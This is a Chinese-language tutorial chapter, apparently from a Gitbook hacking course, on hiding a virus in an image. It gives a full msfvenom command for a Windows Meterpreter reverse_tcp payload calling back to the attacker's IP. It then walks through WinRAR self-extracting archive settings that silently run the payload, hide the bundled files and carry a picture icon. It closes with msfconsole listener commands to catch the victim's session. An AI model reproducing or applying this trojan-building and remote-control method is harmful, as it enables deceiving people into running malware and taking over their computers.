1.1. 如何在图片中隐藏病毒(负载)

这一章节介绍的是使用msfvenom和WinRAR隐藏病毒,马上开始我们的教程

1.2. 测试环境

攻击者:Kali IP地址:192.168.43.126

victim:Windows7 IP地址:192.168.43.163

1.3. 使用msfvenom生成Payload

关于这个话题难的就是如何将病毒隐藏起来,无论是隐藏在图片还是安装程序中,因为生成负载的话,我们之前的章节中有讲到过,就是使用msfvenom这个工具来生成 我们这边也演示一下如何生成负载(照顾一下第一次看到该章节的人) 只需要一条命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.126 LPORT=4444 -f exe > Windows.exe

-p 参数指的是Payload的类型

-LHOST 参数指定的是本地Kali主机的IP地址,就是将TCP会话返回给谁

-LPORT 参数指定的是返回TCP会话使用的本地端口

-f 参数指定的是生成的文件类型

msfvenom

1.4. 使用WinRAR隐藏病毒

生成该负载之后,我们还需要一个软件是WinRAR,这个什么用处你肯定想不到,我们就是利用该软件将病毒隐藏在该图片中

那么如何操作呢?

1.4.1. 准备一张ico图片

这个格式的图片我们可以使用png或者是jpg图片在线转换成ico,该格式是显示图标的

首先打开在线生成ico文件的网址

网站

选择需要上传的图片,选择后点击Upload

图片

选择只定义的icon文件格式

格式

选择转换文件

转换

1.4.2. 打包负载和png文件,准备隐藏病毒

注意:这个使用的图片文件是png而不是转换完成的ico文件

选中文件右键,点击添加到压缩文件

文件

选择创建自解压文件格式

SFX

设置自解压文件参数

shezhi

点击设置选项

option 该选项设置的是当用户点击该自解压文件时,自动运行的文件,我们设置,自动打开一张hack图片和windows应用程序

将压缩文件中文件全部隐藏

yincang 为了让生成的文件看起来更加真实,我们将需要运行的文件全部隐藏

选择图标文件

ico 这一步是添加图标文件,为了也是让文件更加真实

1.4.3. 生成自解压文件

shengcheng

所有的参数都设置完成之后,我们就点击确定生成自解压文件

1.5. 设置监听器(如何这一部分内容不怎么熟悉,建议查看前几章节的介绍)

接下来我们需要让Victim下载该Payload文件,这方法就很多种了,这里不解释

我们使用msfconsole来设置监听器,需要注意的是设置监听器参数的时候需要和生成Payload文件的参数一样,不然不能返回TCP会话

use exploit/multi/handle
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.126
set LPORT 4444

接下来打开监听器

exploit

exploit

现在我们就等待Victim运行该Payload文件

hack

我们现在已经可以看到收到了一个会话信息 sessions

现在就可以控制Victim的电脑,具体可以执行的操作,可以点击链接查看,或者查看前几章节的内容

如果帮助到你了,希望可以得到你的打赏,谢谢B站频道传送门

powered by GitbookFile Modify: 2019-06-22 23:06:47

results matching ""

    No results matching ""